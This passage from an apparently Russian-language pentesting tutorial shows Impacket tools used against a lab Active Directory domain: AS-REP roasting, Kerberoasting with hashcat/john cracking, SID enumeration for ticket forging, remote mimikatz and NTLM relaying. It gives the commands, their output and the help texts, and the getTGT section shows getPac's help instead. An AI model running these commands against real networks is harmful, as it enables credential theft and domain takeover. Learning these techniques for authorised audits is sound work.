\u0434\u043b\u044f \u043e\u0442\u043b\u043e\u0436\u0435\u043d\u043d\u043e\u0433\u043e \u043f\u043e\u0434\u0431\u043e\u0440\u0430 \u043f\u0430\u0440\u043e\u043b\u044f, \u0442\u0430\u043a \u043a\u0430\u043a \u043e\u043d\u0438 \u0431\u0443\u0434\u0443\u0442 \u0437\u0430\u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u044b \u043f\u0430\u0440\u043e\u043b\u0435\u043c \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f. \u0414\u043b\u044f \u0442\u0435\u0445, \u043a\u0442\u043e \u043d\u0438\u0447\u0435\u0433\u043e \u043d\u0435 \u043f\u043e\u043d\u044f\u043b: \u0437\u0434\u0435\u0441\u044c \u043d\u0430\u043f\u0438\u0441\u0430\u043d\u043e \u043f\u0440\u043e \u043c\u0435\u0442\u043e\u0434\u0438\u043a\u0443 \u0430\u0442\u0430\u043a\u0438 \u043d\u0430 Active Directory ASREPROAST<\/font><\/b>, \u043a\u043e\u0433\u0434\u0430 \u043d\u0430 \u0441\u0435\u0440\u0432\u0435\u0440\u0435 \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440 \u0437\u0430\u0434\u0430\u043b \u043a\u043e\u0440\u0440\u0435\u043a\u0442\u043d\u044b\u0435, \u0441 \u0435\u0433\u043e \u0442\u043e\u0447\u043a\u0438 \u0437\u0440\u0435\u043d\u0438\u044f, \u043d\u0430\u0441\u0442\u0440\u043e\u0439\u043a\u0438 Kerberos \u0434\u043b\u044f \u0443\u0447\u0451\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438, \u0430 \u0430\u0443\u0434\u0438\u0442\u043e\u0440 \u0438\u0445 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b, \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e \u043f\u043e\u043b\u0443\u0447\u0438\u043b \u043d\u0443\u0436\u043d\u0443\u044e \u0442\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u0443\u044e \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u0438 \u043f\u043e\u043f\u044b\u0442\u0430\u043b\u0441\u044f \u0432\u043e\u0441\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c \u043f\u0430\u0440\u043e\u043b\u044c. \u0412\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u043c \u043e\u0442 \u0438\u043c\u0435\u043d\u0438 \u043b\u044e\u0431\u043e\u0439 \u0434\u043e\u043c\u0435\u043d\u043d\u043e\u0439 \u0443\u0447\u0451\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438:<\/p>\n
.\/GetNPUsers.py ad.ruvds.ru\/Ruvds -request  Name  MemberOf  PasswordLastSet             LastLogon                   UAC ----  --------  --------------------------  --------------------------  -------- test            2023-01-12 20:56:06.969165  2023-04-03 16:59:57.351166  0x410200 $krb5asrep$23$test@AD.RUVDS.RU:96112...73af5559c804a9458a88221c959a98453 <\/code><\/pre>\n
  \u0414\u0430\u043b\u0435\u0435 \u0445\u0435\u0448 \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u044f\u0435\u043c \u043d\u0430 \u043f\u0435\u0440\u0435\u0431\u043e\u0440:<\/p>\n
john --wordlist=\u0441\u043b\u043e\u0432\u0430\u0440\u044c.txt \u0444\u0430\u0439\u043b_\u0441_\u0445\u0435\u0448\u0430\u043c\u0438.hashes <\/code><\/pre>\n
  <\/p>\n
                         \u0421\u0438\u043d\u0442\u0430\u043a\u0441\u0438\u0441:<\/b>                         <\/p>\n
\n
usage: GetNPUsers.py [-h] [-request] [-outputfile OUTPUTFILE]                      [-format {hashcat,john}] [-usersfile USERSFILE] [-ts]                      [-debug] [-hashes LMHASH:NTHASH] [-no-pass] [-k]                      [-aesKey hex key] [-dc-ip ip address]                      target  positional arguments:   target                domain\/username[:password]  optional arguments:   -h, --help            show this help message and exit   -request              Requests TGT for users and output them in JtR\/hashcat                         format (default False)   -outputfile OUTPUTFILE                         Output filename to write ciphers in JtR\/hashcat format   -format {hashcat,john}                         format to save the AS_REQ of users without pre-                         authentication. Default is hashcat   -usersfile USERSFILE  File with user per line to test   -ts                   Adds timestamp to every logging output   -debug                Turn DEBUG output ON  authentication:   -hashes LMHASH:NTHASH                         NTLM hashes, format is LMHASH:NTHASH   -no-pass              don't ask for password (useful for -k)   -k                    Use Kerberos authentication. Grabs credentials from                         ccache file (KRB5CCNAME) based on target parameters.                         If valid credentials cannot be found, it will use the                         ones specified in the command line   -aesKey hex key       AES key to use for Kerberos Authentication (128 or 256                         bits)   -dc-ip ip address     IP Address of the domain controller. If ommited it use                         the domain part (FQDN) specified in the target                         parameter  There are a few modes for using this script  1. Get a TGT for a user:          GetNPUsers.py contoso.com\/john.doe -no-pass  For this operation you don't need john.doe's password. It is important tho, to specify -no-pass in the script, otherwise a badpwdcount entry will be added to the user  2. Get a list of users with UF_DONT_REQUIRE_PREAUTH set          GetNPUsers.py contoso.com\/emily:password or GetNPUsers.py contoso.com\/emily  This will list all the users in the contoso.com domain that have UF_DONT_REQUIRE_PREAUTH set. However it will require you to have emily's password. (If you don't specify it, it will be asked by the script)  3. Request TGTs for all users          GetNPUsers.py contoso.com\/emily:password -request or GetNPUsers.py contoso.com\/emily  4. Request TGTs for users in a file          GetNPUsers.py contoso.com\/ -no-pass -usersfile users.txt  For this operation you don't need credentials.<\/code><\/pre>\n<\/div><\/div>\n
  <\/p>\n
\u258d getTGT.py<\/font><\/h3>\n
  \u0412\u044b\u043f\u0438\u0441\u0430\u0442\u044c \u0438 \u043f\u0440\u0438\u043c\u0435\u043d\u0438\u0442\u044c TGT \u0434\u043b\u044f \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e\u0439 \u0443\u0447\u0451\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438. \u0418\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0432 \u0430\u0442\u0430\u043a\u0430\u0445 \u043d\u0430 Kerberos, \u0434\u0430 \u0438 \u0432\u043e\u043e\u0431\u0449\u0435 \u0434\u043b\u044f \u0440\u0430\u0431\u043e\u0442\u044b \u0441 \u0431\u0438\u043b\u0435\u0442\u0430\u043c\u0438 \u0438\u0437-\u043f\u043e\u0434 Linux:  <\/p>\n
getTGT.py ad.ruvds.ru\/admin:password -dc-ip 192.168.1.13 KRB5CCNAME=admin.ccache <\/code><\/pre>\n
  \u0412\u0442\u043e\u0440\u0430\u044f \u043a\u043e\u043c\u0430\u043d\u0434\u0430 \u043f\u0440\u0438\u043c\u0435\u043d\u044f\u0435\u0442 \u0432\u044b\u043f\u0438\u0441\u0430\u043d\u043d\u044b\u0439 \u0431\u0438\u043b\u0435\u0442 \u0432 \u0441\u0435\u0430\u043d\u0441 \u0432\u0438\u0440\u0442\u0443\u0430\u043b\u044c\u043d\u043e\u0439 \u043a\u043e\u043d\u0441\u043e\u043b\u0438. \u0414\u0435\u043b\u0430\u0435\u0442\u0441\u044f \u044d\u0442\u043e \u0434\u043b\u044f \u0442\u043e\u0433\u043e, \u0447\u0442\u043e\u0431\u044b \u0432 \u0434\u0430\u043b\u044c\u043d\u0435\u0439\u0448\u0435\u043c \u0440\u0430\u0431\u043e\u0442\u0430\u0442\u044c \u0441 Active Directory \u043f\u043e\u0441\u0440\u0435\u0434\u0441\u0442\u0432\u043e\u043c Kerberos. \u041d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, \u043d\u0435 \u0432\u0432\u043e\u0434\u0438\u0442\u044c \u043f\u0430\u0440\u043e\u043b\u0438 \u0434\u043b\u044f \u043a\u043e\u043c\u0430\u043d\u0434 Impacket, \u0430 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440 —no-pass<\/i>. \u0412 \u043a\u0430\u0436\u0434\u043e\u0439 \u0448\u0443\u0442\u043a\u0435 \u0435\u0441\u0442\u044c \u0434\u043e\u043b\u044f \u0448\u0443\u0442\u043a\u0438)<\/s>.<\/p>\n
                         \u0421\u0438\u043d\u0442\u0430\u043a\u0441\u0438\u0441:<\/b>                         <\/p>\n
\n
usage: getPac.py [-h] -targetUser TARGETUSER [-debug] [-hashes LMHASH:NTHASH] credentials  positional arguments:   credentials           domain\/username[:password]. Valid domain credentials to use for grabbing targetUser's PAC  optional arguments:   -h, --help            show this help message and exit   -targetUser TARGETUSER                         the target user to retrieve the PAC of   -debug                Turn DEBUG output ON  authentication:   -hashes LMHASH:NTHASH                         NTLM hashes, format is LMHASH:NTHASH<\/code><\/pre>\n<\/div><\/div>\n
  <\/p>\n
\u258d GetUserSPNs<\/font><\/h3>\n
  \u0417\u0430\u043f\u0440\u0430\u0448\u0438\u0432\u0430\u0435\u0442 \u0446\u0435\u043b\u0435\u0432\u043e\u0439 \u0434\u043e\u043c\u0435\u043d \u0434\u043b\u044f \u0438\u043c\u0451\u043d SPN<\/a>, \u0440\u0430\u0431\u043e\u0442\u0430\u044e\u0449\u0438\u0445 \u043f\u043e\u0434 \u0443\u0447\u0451\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u044c\u044e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f. \u041d\u0430 \u044d\u0442\u043e\u0442 \u0440\u0430\u0437 \u0430\u0442\u0430\u043a\u0430 KERBEROAST<\/font><\/b> \u0432\u043e \u0432\u0441\u0435\u0439 \u043a\u0440\u0430\u0441\u0435. \u0417\u043d\u0430\u044f \u0443\u0447\u0451\u0442\u043d\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435 \u043b\u044e\u0431\u043e\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0434\u043e\u043c\u0435\u043d\u0430 \u0438 SPN \u0443\u0447\u0451\u0442\u043d\u044b\u0445 \u0437\u0430\u043f\u0438\u0441\u0435\u0439 \u0438\u0437 \u0434\u043e\u043c\u0435\u043d\u0430, \u0430\u0443\u0434\u0438\u0442\u043e\u0440 \u043c\u043e\u0436\u0435\u0442 \u0437\u0430\u043f\u0440\u043e\u0441\u0438\u0442\u044c TGS<\/a> \u043e\u0442 \u0438\u043c\u0435\u043d\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f (\u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e\u0433\u043e \u0435\u043c\u0443, \u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, \u043f\u043e\u0441\u043b\u0435 password spraying<\/a>) \u0434\u043b\u044f \u0434\u0430\u043d\u043d\u044b\u0445 \u044d\u043a\u0437\u0435\u043c\u043f\u043b\u044f\u0440\u043e\u0432 SPN. \u0410 \u0432\u0437\u043b\u043e\u043c\u0430\u0432 TGS, \u0443\u0437\u043d\u0430\u0442\u044c \u043f\u0430\u0440\u043e\u043b\u0438 \u043e\u0442 \u044d\u0442\u0438\u0445 \u0443\u0447\u0451\u0442\u043d\u044b\u0445 \u0437\u0430\u043f\u0438\u0441\u0435\u0439 (\u0443\u0447\u0451\u0442\u043d\u044b\u0445 \u0437\u0430\u043f\u0438\u0441\u0435\u0439 SPN, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043c\u043e\u0433\u0443\u0442 \u0438\u043c\u0435\u0442\u044c \u0448\u0438\u0440\u043e\u043a\u0438\u0435 \u043f\u0440\u0430\u0432\u0430 \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u0438 \u0434\u043b\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0439 \u0435\u0441\u043b\u0438 \u043d\u0435 \u0432\u0435\u0447\u043d\u044b\u0439<\/s> \u043f\u0435\u0440\u0441\u0438\u0441\u0442\u0430\u043d\u0441 \u043f\u0430\u0440\u043e\u043b\u0435\u0439). \u041f\u043e\u043b\u0443\u0447\u0435\u043d\u043d\u044b\u0435 \u0445\u0435\u0448\u0438 \u043d\u0430\u043f\u0440\u0430\u0432\u043b\u044f\u044e\u0442\u0441\u044f \u043d\u0430 \u0432\u043e\u0441\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435, \u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, \u0432 hashcat:  <\/p>\n
.\/GetUserSPNs.py -request -dc-ip 192.168.1.13 ad.ruvds.ru\/Ruvds  ServicePrincipalName  Name     MemberOf  PasswordLastSet             LastLogon                   Delegation --------------------  -------  --------  --------------------------  --------------------------  ----------- HTTP\/ad.ruvds.ru   iis_svc            2023-02-13 15:21:08.345126  2023-03-29 16:39:22.877495 cifs\/ad.ruvds.ru   Backup             2023-03-20 15:47:56.875247  2023-03-20 16:27:18.994585  constrained [-] CCache file is not found. Skipping... $krb5tgs$23$*iis_svc$AD.RUVDS.RU$ad.ruvds.ru\/iis_svc*$6a18d8ad3e4147f72d40a...cfb06f42232ccaac066b18bc4e6d3e3415aa8ce7dbbbcfb80375e $krb5tgs$23$*Backup$AD.RUVDS.RU$ad.ruvds.ru\/Backup*$b5cedc9f87eed91be8028cf...b271176a28ee3d18f83755739bbbb7ea8cf26a642a723ca3d53e  hashcat -a 0 -m 13100 \u0444\u0430\u0439\u043b_\u0441_\u0445\u0435\u0448\u0430\u043c\u0438 \u0441\u043b\u043e\u0432\u0430\u0440\u044c.txt <\/code><\/pre>\n
  <\/p>\n
                         \u0421\u0438\u043d\u0442\u0430\u043a\u0441\u0438\u0441:<\/b>                         <\/p>\n
\n
usage: GetUserSPNs.py [-h] [-target-domain TARGET_DOMAIN] [-usersfile USERSFILE] [-request] [-request-user username] [-save] [-outputfile OUTPUTFILE] [-debug]                       [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-dc-ip ip address]                       target  positional arguments:   target                domain\/username[:password]  optional arguments:   -h, --help            show this help message and exit   -target-domain TARGET_DOMAIN                         Domain to query\/request if different than the domain of the user. Allows for Kerberoasting across trusts.   -usersfile USERSFILE  File with user per line to test   -request              Requests TGS for users and output them in JtR\/hashcat format (default False)   -request-user username                         Requests TGS for the SPN associated to the user specified (just the username, no domain needed)   -save                 Saves TGS requested to disk. Format is <username>.ccache. Auto selects -request   -outputfile OUTPUTFILE                         Output filename to write ciphers in JtR\/hashcat format   -debug                Turn DEBUG output ON  authentication:   -hashes LMHASH:NTHASH                         NTLM hashes, format is LMHASH:NTHASH   -no-pass              don't ask for password (useful for -k)   -k                    Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use                         the ones specified in the command line   -aesKey hex key       AES key to use for Kerberos Authentication (128 or 256 bits)   -dc-ip ip address     IP Address of the domain controller. If ommited it use the domain part (FQDN) specified in the target parameter. Ignoredif -target-domain is specified.<\/code><\/pre>\n<\/div><\/div>\n
  <\/p>\n
\u258d lookupsid<\/font><\/h3>\n
  \u0423\u0437\u043d\u0430\u0442\u044c \u0430\u0442\u0440\u0438\u0431\u0443\u0442 SID<\/a> \u0434\u043e\u043c\u0435\u043d\u0430. \u0417\u0430\u0434\u0430\u0447\u0430 \u0442\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u0430\u044f, \u043e\u043d \u043d\u0443\u0436\u0435\u043d \u0434\u043b\u044f \u043f\u0440\u043e\u0432\u0435\u0434\u0435\u043d\u0438\u044f \u0430\u0442\u0430\u043a Silver Ticket<\/a><\/font><\/b> \u0438 Golden Ticket<\/a><\/font><\/b>:<\/p>\n
python3 \/usr\/share\/doc\/python3-impacket\/examples\/lookupsid.py ad.ruvds.ru\/admin:password@192.168.1.13  [*] Brute forcing SIDs at 192.168.1.13 [*] StringBinding ncacn_np:192.168.1.13[\\pipe\\lsarpc] [*] Domain SID is: S-1-5-21-1377681614-1103095939-2089592296 498: AD\\\u041a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440\u044b \u0434\u043e\u043c\u0435\u043d\u0430 \u043f\u0440\u0435\u0434\u043f\u0440\u0438\u044f\u0442\u0438\u044f - \u0442\u043e\u043b\u044c\u043a\u043e \u0447\u0442\u0435\u043d\u0438\u0435 (SidTypeGroup) 500: AD\\\u0410\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440 (SidTypeUser) 501: AD\\\u0413\u043e\u0441\u0442\u044c (SidTypeUser) 502: AD\\krbtgt (SidTypeUser) 512: AD\\\u0410\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u044b \u0434\u043e\u043c\u0435\u043d\u0430 (SidTypeGroup) 513: AD\\\u041f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u0434\u043e\u043c\u0435\u043d\u0430 (SidTypeGroup) 514: AD\\\u0413\u043e\u0441\u0442\u0438 \u0434\u043e\u043c\u0435\u043d\u0430 (SidTypeGroup) 515: AD\\\u041a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u044b \u0434\u043e\u043c\u0435\u043d\u0430 (SidTypeGroup) 516: AD\\\u041a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440\u044b \u0434\u043e\u043c\u0435\u043d\u0430 (SidTypeGroup) 517: AD\\\u0418\u0437\u0434\u0430\u0442\u0435\u043b\u0438 \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0432 (SidTypeAlias) 518: AD\\\u0410\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u044b \u0441\u0445\u0435\u043c\u044b (SidTypeGroup) 519: AD\\\u0410\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u044b \u043f\u0440\u0435\u0434\u043f\u0440\u0438\u044f\u0442\u0438\u044f (SidTypeGroup) 520: AD\\\u0412\u043b\u0430\u0434\u0435\u043b\u044c\u0446\u044b-\u0441\u043e\u0437\u0434\u0430\u0442\u0435\u043b\u0438 \u0433\u0440\u0443\u043f\u043f\u043e\u0432\u043e\u0439 \u043f\u043e\u043b\u0438\u0442\u0438\u043a\u0438 (SidTypeGroup) 521: AD\\\u041a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440\u044b \u0434\u043e\u043c\u0435\u043d\u0430 - \u0442\u043e\u043b\u044c\u043a\u043e \u0447\u0442\u0435\u043d\u0438\u0435 (SidTypeGroup) 522: AD\\\u041a\u043b\u043e\u043d\u0438\u0440\u0443\u0435\u043c\u044b\u0435 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440\u044b \u0434\u043e\u043c\u0435\u043d\u0430 (SidTypeGroup) 525: AD\\Protected Users (SidTypeGroup) 526: AD\\\u0410\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u044b \u043e\u0441\u043d\u043e\u0432\u043d\u043e\u0433\u043e \u0443\u0440\u043e\u0432\u043d\u044f (SidTypeGroup) 527: AD\\\u0410\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u044b \u043e\u0441\u043d\u043e\u0432\u043d\u043e\u0433\u043e \u0443\u0440\u043e\u0432\u043d\u044f \u043f\u0440\u0435\u0434\u043f\u0440\u0438\u044f\u0442\u0438\u044f (SidTypeGroup) 553: AD\\\u0421\u0435\u0440\u0432\u0435\u0440\u044b RAS \u0438 IAS (SidTypeAlias) 571: AD\\\u0413\u0440\u0443\u043f\u043f\u0430 \u0441 \u0440\u0430\u0437\u0440\u0435\u0448\u0435\u043d\u0438\u0435\u043c \u0440\u0435\u043f\u043b\u0438\u043a\u0430\u0446\u0438\u0438 \u043f\u0430\u0440\u043e\u043b\u0435\u0439 RODC (SidTypeAlias) 572: AD\\\u0413\u0440\u0443\u043f\u043f\u0430 \u0441 \u0437\u0430\u043f\u0440\u0435\u0449\u0435\u043d\u0438\u0435\u043c \u0440\u0435\u043f\u043b\u0438\u043a\u0430\u0446\u0438\u0438 \u043f\u0430\u0440\u043e\u043b\u0435\u0439 RODC (SidTypeAlias) 1002: AD\\Windows Admin Center CredSSP Administrators (SidTypeAlias) 1003: AD\\WIN-LIELOSOD7LK$ (SidTypeUser) 1104: AD\\DnsAdmins (SidTypeAlias) 1105: AD\\DnsUpdateProxy (SidTypeGroup) 1106: AD\\RUVDSMASTER$ (SidTypeUser) 1107: AD\\Ruvds (SidTypeUser) 1108: AD\\RUVDS-PC$ (SidTypeUser) 1111: AD\\RBCDmachine$ (SidTypeUser) 1112: AD\\test (SidTypeUser) 1114: AD\\admin (SidTypeUser) <\/code><\/pre>\n
  <\/p>\n
                         \u0421\u0438\u0442\u043d\u0430\u043a\u0441\u0438\u0441:<\/b>                         <\/p>\n
\n
usage: lookupsid.py [-h] [-ts] [-target-ip ip address] [-port [destination port]] [-domain-sids] [-hashes LMHASH:NTHASH] [-no-pass] target [maxRid]   positional arguments:   target                [[domain\/]username[:password]@]<targetName or address>   maxRid                max Rid to check (default 4000)  optional arguments:   -h, --help            show this help message and exit   -ts                   Adds timestamp to every logging output  connection:   -target-ip ip address                         IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name and you cannot                         resolve it   -port [destination port]                         Destination port to connect to SMB Server   -domain-sids          Enumerate Domain SIDs (will likely forward requests to the DC)  authentication:   -hashes LMHASH:NTHASH                         NTLM hashes, format is LMHASH:NTHASH   -no-pass              don't ask for password (useful when proxying through smbrelayx)<\/code><\/pre>\n<\/div><\/div>\n
  <\/p>\n
\u258d mimikatz<\/font><\/h3>\n
  \u041f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u043d\u0435 \u0442\u0440\u0435\u0431\u0443\u0435\u0442 \u0438 \u043e\u043f\u0438\u0441\u0430\u043d \u0431\u044b\u043b \u0443\u0436\u0435 \u0432 \u0441\u0442\u0430\u0442\u044c\u0435. \u0423\u0441\u043f\u0435\u0448\u043d\u043e\u0435 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u0441\u043a\u0440\u0438\u043f\u0442\u0430 \u043f\u0440\u0438\u0432\u0435\u0434\u0451\u0442 \u043a \u043e\u0442\u043a\u0440\u044b\u0442\u0438\u044e Mimikatz \u043d\u0430 \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e\u043c \u0441\u0435\u0440\u0432\u0435\u0440\u0435. \u041d\u0430 \u0441\u043e\u0432\u0440\u0435\u043c\u0435\u043d\u043d\u044b\u0445 \u0432\u0435\u0440\u0441\u0438\u044f\u0445 Windows Server \u0435\u0433\u043e \u0442\u0443\u0442 \u0436\u0435 \u043f\u0440\u0438\u0431\u044c\u0451\u0442 Defender<\/i>:<\/p>\n
python3 mimikatz.py ad.ruvds.ru\/admin:password@192.168.1.13    .#####.   mimikatz 2.2.0 (x64) #19041 Apr 10 2023 17:19:53  .## ^ ##.  \"A La Vie, A L'Amour\" - (oe.eo)  ## \/ \\ ##  \/*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )  ## \\ \/ ##       > https:\/\/blog.gentilkiwi.com\/mimikatz  '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )   '#####'        > https:\/\/pingcastle.com \/ https:\/\/mysmartlogon.com ***\/  mimikatz(commandline) # <\/code><\/pre>\n
  <\/p>\n
                         \u0421\u0438\u043d\u0442\u0430\u043a\u0441\u0438\u0441:<\/b>                         <\/p>\n
\n
usage: mimikatz.py [-h] [-file FILE] [-debug] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-dc-ip ip address] [-target-ip ip address] target   positional arguments:   target                [[domain\/]username[:password]@]<targetName or address>  optional arguments:   -h, --help            show this help message and exit   -file FILE            input file with commands to execute in the mini shell   -debug                Turn DEBUG output ON  authentication:   -hashes LMHASH:NTHASH                         NTLM hashes, format is LMHASH:NTHASH   -no-pass              don't ask for password (useful for -k)   -k                    Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use                         the ones specified in the command line   -aesKey hex key       AES key to use for Kerberos Authentication (128 or 256 bits)  connection:   -dc-ip ip address     IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter   -target-ip ip address                         IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name and you cannot                         resolve it<\/code><\/pre>\n<\/div><\/div>\n
  <\/p>\n
\u258d ntlmrelayx<\/font><\/h3>\n
  \u0421\u0442\u0430\u0440\u0442\u0443\u0435\u0442 \u043f\u0440\u043e\u0441\u043b\u0443\u0448\u0438\u0432\u0430\u0442\u0435\u043b\u044c, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043a\u0430\u0436\u0434\u043e\u0435 \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u043d\u043e\u0435 \u0441\u043e\u0435\u0434\u0438\u043d\u0435\u043d\u0438\u0435 (\u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u044b DCSYNC, MSSQL, SMTP, IMAP, IMAPS, HTTP, HTTPS, SMB, RPC, LDAP, LDAPS, HTTP, HTTPS, SMB, MSSQL, IMAP, IMAPS<\/i>) \u043f\u044b\u0442\u0430\u0435\u0442\u0441\u044f \u0440\u0435\u0442\u0440\u0430\u043d\u0441\u043b\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0432 \u0443\u043a\u0430\u0437\u0430\u043d\u043d\u0443\u044e \u0446\u0435\u043b\u0435\u0432\u0443\u044e \u0441\u0438\u0441\u0442\u0435\u043c\u0443. \u0417\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u043c \u0441\u043a\u0440\u0438\u043f\u0442 \u0438 \u0436\u0434\u0451\u043c \u0441\u043e\u0431\u044b\u0442\u0438\u044f \u0432 \u0441\u0435\u0442\u0438:<\/p>\n
python3 ntlmrelayx.py --target 192.168.1.13 -socks -smb2support -debug  [+] Impacket Library Installation Path: \/usr\/local\/lib\/python3.9\/dist-packages\/impacket [*] Protocol Client DCSYNC loaded.. [*] Protocol Client MSSQL loaded.. [*] Protocol Client SMTP loaded.. [*] Protocol Client IMAP loaded.. [*] Protocol Client IMAPS loaded.. [*] Protocol Client HTTP loaded.. [*] Protocol Client HTTPS loaded.. [*] Protocol Client SMB loaded.. [*] Protocol Client RPC loaded.. [*] Protocol Client LDAP loaded.. [*] Protocol Client LDAPS loaded.. [+] Protocol Attack HTTP loaded.. [+] Protocol Attack HTTPS loaded.. [+] Protocol Attack SMB loaded.. [+] Protocol Attack MSSQL loaded.. [+] Protocol Attack IMAP loaded.. [+] Protocol Attack IMAPS loaded.. [+] Protocol Attack DCSYNC loaded.. [+] Protocol Attack RPC loaded.. [+] Protocol Attack LDAP loaded.. [+] Protocol Attack LDAPS loaded.. [*] Running in relay mode to single host [*] Setting up SMB Server [*] Setting up HTTP Server on port 80 [*] Setting up WCF Server [*] Setting up RAW Server on port 6666  [*] Servers started, waiting for connections <\/code><\/pre>\n
  \u0415\u0441\u043b\u0438 \u0432 \u0441\u0435\u0442\u0438 \u043f\u0440\u043e\u0442\u0435\u043a\u0430\u0435\u0442 \u043d\u0443\u0436\u043d\u0430\u044f \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u044c \u0438 \u0441\u043a\u0440\u0438\u043f\u0442 \u0435\u0451 \u0437\u0430\u0444\u0438\u043a\u0441\u0438\u0440\u0443\u0435\u0442, \u0442\u043e \u043c\u043e\u0436\u043d\u043e \u0443\u0432\u0438\u0434\u0435\u0442\u044c \u043f\u0440\u0438\u043c\u0435\u0440\u043d\u043e \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u0435:<\/p>\n
[*] SMBD-Thread-10: Received connection from 192.168.18.13, attacking target smb:\/\/192.168.1.13 [-] Signing is required, attack won't work unless using -remove-target \/ --remove-mic [*] Authenticating against smb:\/\/192.168.1.13 as AD\/RUVDS-PC$ SUCCEED [*] SOCKS: Adding AD\/RUVDS-PC$@192.168.1.13(445) to active SOCKS connection. Enjoy [+] Checking admin status for user AD\/RUVDS-PC$ [+] isAdmin returned: FALSE  socks  Protocol  Target        Username     AdminStatus  Port --------  ------------  -----------  -----------  ---- SMB       192.168.1.13  AD\/RUVDS-PC$  FALSE        445 ntlmrelayx> [+] KeepAlive Timer reached. Updating connections [+] Calling keepAlive() for AD\/RUVDS-PC$@192.168.1.13:445 <\/code><\/pre>\n
